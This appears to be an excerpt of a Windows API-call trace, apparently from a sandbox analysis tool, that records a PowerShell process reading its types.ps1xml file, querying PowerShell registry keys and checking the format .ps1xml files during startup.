	[0524.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0524.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0526.720] GetSystemInfo (in: lpSystemInfo=0xac200 | out: lpSystemInfo=0xac200*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0526.721] VirtualQuery (in: lpAddress=0xac2b0, lpBuffer=0xad170, dwLength=0x30 | out: lpBuffer=0xad170*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0526.733] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0526.733] GetFileType (hFile=0x324) returned 0x1
	[0526.733] SetErrorMode (uMode=0x1) returned 0x1
	[0526.733] GetFileType (hFile=0x324) returned 0x1
	[0526.733] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.734] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.734] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.735] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.735] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.735] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.735] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.735] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.735] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.736] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.737] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.737] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.737] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.738] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.738] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.738] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.739] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.740] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.740] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.740] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.741] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.741] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.741] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.742] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.742] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.743] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.743] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.743] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.744] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.744] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.744] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.744] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.745] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.747] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.748] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.748] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.748] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.749] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.749] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.749] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.749] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1000, lpOverlapped=0x0) returned 1
	[0526.750] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x1b4, lpOverlapped=0x0) returned 1
	[0526.750] ReadFile (in: hFile=0x324, lpBuffer=0x2ce20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad568, lpOverlapped=0x0 | out: lpBuffer=0x2ce20e0*, lpNumberOfBytesRead=0xad568*=0x0, lpOverlapped=0x0) returned 1
	[0526.750] CloseHandle (hObject=0x324) returned 1
	[0526.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0526.750] SetErrorMode (uMode=0x1) returned 0x1
	[0526.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad4e0 | out: lpFileInformation=0xad4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0526.750] SetErrorMode (uMode=0x1) returned 0x1
	[0526.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0526.751] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad5c8 | out: phkResult=0xad5c8*=0x324) returned 0x0
	[0526.751] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad54c, lpData=0x0, lpcbData=0xad548*=0x0 | out: lpType=0xad54c*=0x1, lpData=0x0, lpcbData=0xad548*=0x56) returned 0x0
	[0526.751] CoTaskMemAlloc (cb=0x5a) returned 0x227d80
	[0526.751] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad51c, lpData=0x227d80, lpcbData=0xad518*=0x56 | out: lpType=0xad51c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad518*=0x56) returned 0x0
	[0526.751] CoTaskMemFree (pv=0x227d80) 
	[0526.751] RegCloseKey (hKey=0x324) returned 0x0
	[0526.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0526.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0529.713] VirtualQuery (in: lpAddress=0xac2b0, lpBuffer=0xad170, dwLength=0x30 | out: lpBuffer=0xad170*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0530.813] VirtualQuery (in: lpAddress=0xac2b0, lpBuffer=0xad170, dwLength=0x30 | out: lpBuffer=0xad170*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0530.822] VirtualQuery (in: lpAddress=0xac2b0, lpBuffer=0xad170, dwLength=0x30 | out: lpBuffer=0xad170*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0530.823] VirtualQuery (in: lpAddress=0xac2b0, lpBuffer=0xad170, dwLength=0x30 | out: lpBuffer=0xad170*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0535.834] VirtualQuery (in: lpAddress=0xac2c0, lpBuffer=0xad180, dwLength=0x30 | out: lpBuffer=0xad180*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0535.836] VirtualQuery (in: lpAddress=0xac2c0, lpBuffer=0xad180, dwLength=0x30 | out: lpBuffer=0xad180*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0535.838] VirtualQuery (in: lpAddress=0xac2b0, lpBuffer=0xad170, dwLength=0x30 | out: lpBuffer=0xad170*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0536.801] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0536.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0536.801] CoTaskMemFree (pv=0x19b1a0) 
	[0536.822] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad768 | out: phkResult=0xad768*=0x324) returned 0x0
	[0536.822] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad77c, lpData=0x0, lpcbData=0xad778*=0x0 | out: lpType=0xad77c*=0x1, lpData=0x0, lpcbData=0xad778*=0x74) returned 0x0
	[0536.823] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad6ec, lpData=0x0, lpcbData=0xad6e8*=0x0 | out: lpType=0xad6ec*=0x1, lpData=0x0, lpcbData=0xad6e8*=0x74) returned 0x0
	[0536.823] CoTaskMemAlloc (cb=0x78) returned 0x1e09a0
	[0536.823] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0xad6bc, lpData=0x1e09a0, lpcbData=0xad6b8*=0x74 | out: lpType=0xad6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xad6b8*=0x74) returned 0x0
	[0536.823] CoTaskMemFree (pv=0x1e09a0) 
	[0536.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0536.823] SetErrorMode (uMode=0x1) returned 0x1
	[0536.823] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0536.823] SetErrorMode (uMode=0x1) returned 0x1
	[0536.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0536.825] SetErrorMode (uMode=0x1) returned 0x1
	[0536.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0536.825] SetErrorMode (uMode=0x1) returned 0x1
	[0536.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0536.825] SetErrorMode (uMode=0x1) returned 0x1
	[0536.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0536.825] SetErrorMode (uMode=0x1) returned 0x1
	[0536.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0536.825] SetErrorMode (uMode=0x1) returned 0x1
	[0536.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0536.826] SetErrorMode (uMode=0x1) returned 0x1
	[0536.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0536.826] SetErrorMode (uMode=0x1) returned 0x1
	[0536.826] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0536.826] SetErrorMode (uMode=0x1) returned 0x1
	[0536.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0536.826] SetErrorMode (uMode=0x1) returned 0x1
	[0536.826] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0536.826] SetErrorMode (uMode=0x1) returned 0x1
	[0536.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0536.827] SetErrorMode (uMode=0x1) returned 0x1
